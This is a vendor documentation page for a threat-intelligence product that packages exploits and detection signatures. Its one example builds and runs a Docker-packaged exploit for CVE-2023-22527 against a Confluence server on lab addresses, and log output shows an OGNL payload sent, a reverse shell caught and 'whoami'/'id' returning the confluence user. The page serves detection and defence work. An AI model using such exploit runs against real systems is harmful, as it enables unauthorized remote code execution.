Initial Access Intelligence

Compile Exploit Code

Use Docker to compile and run the VulnCheck provided go-exploit scanner

VulnCheck's Initial Access Intelligence product provides organizations with dockerized in-house developed exploits and network scanners, packet captures (PCAP files), Suricata & Snort signatures to detect exploitation, YARA rules (when possible), CPE strings, Nmap scripts, vulnerable docker files, mapping to GreyNoise tags, and measuring Internet-level exposure of potentially vulnerable systems using Censys & Shodan. VulnCheck packages these detection artifacts for organizations to detect & respond.

VulnCheck's exploit proof of concept (PoC) and network scanner code is written in the Go programming language. They are provided with a Dockerfile for ease of use. The exploits leverage an Open Source Software (OSS) shared library, which VulnCheck has authored and maintains, called go-exploit.

The following example shows compilation and use of a go-exploit for CVE-2023-22527:

user@vc:/initial-access/feed/cve-2023-22527$ make docker
user@vc:/initial-access/feed/cve-2023-22527$ docker run -it --network=host cve-2023-22527 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting listener on 10.9.49.85:1270"
time=2024-02-22T18:05:27.675Z level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8090 ssl=false "ssl auto"=false
time=2024-02-22T18:05:27.675Z level=STATUS msg="Validating Confluence target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.018Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.88 port=8090 verified=true
time=2024-02-22T18:05:28.018Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8090
time=2024-02-22T18:05:28.202Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.88 port=8090 version=8.5.3
time=2024-02-22T18:05:28.202Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8090 vulnerable=yes
time=2024-02-22T18:05:28.202Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.384Z level=STATUS msg="Sending class EzrKbvJgvWl to http://10.9.49.88:8090/template/aui/text-inline.vm"
time=2024-02-22T18:05:28.421Z level=SUCCESS msg="Caught new shell from 10.9.49.88:42562"
time=2024-02-22T18:05:28.421Z level=STATUS msg="Active shell from 10.9.49.88:42562"
time=2024-02-22T18:05:38.390Z level=STATUS msg="Exploit successfully completed" exploited=true
whoami
confluence
id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)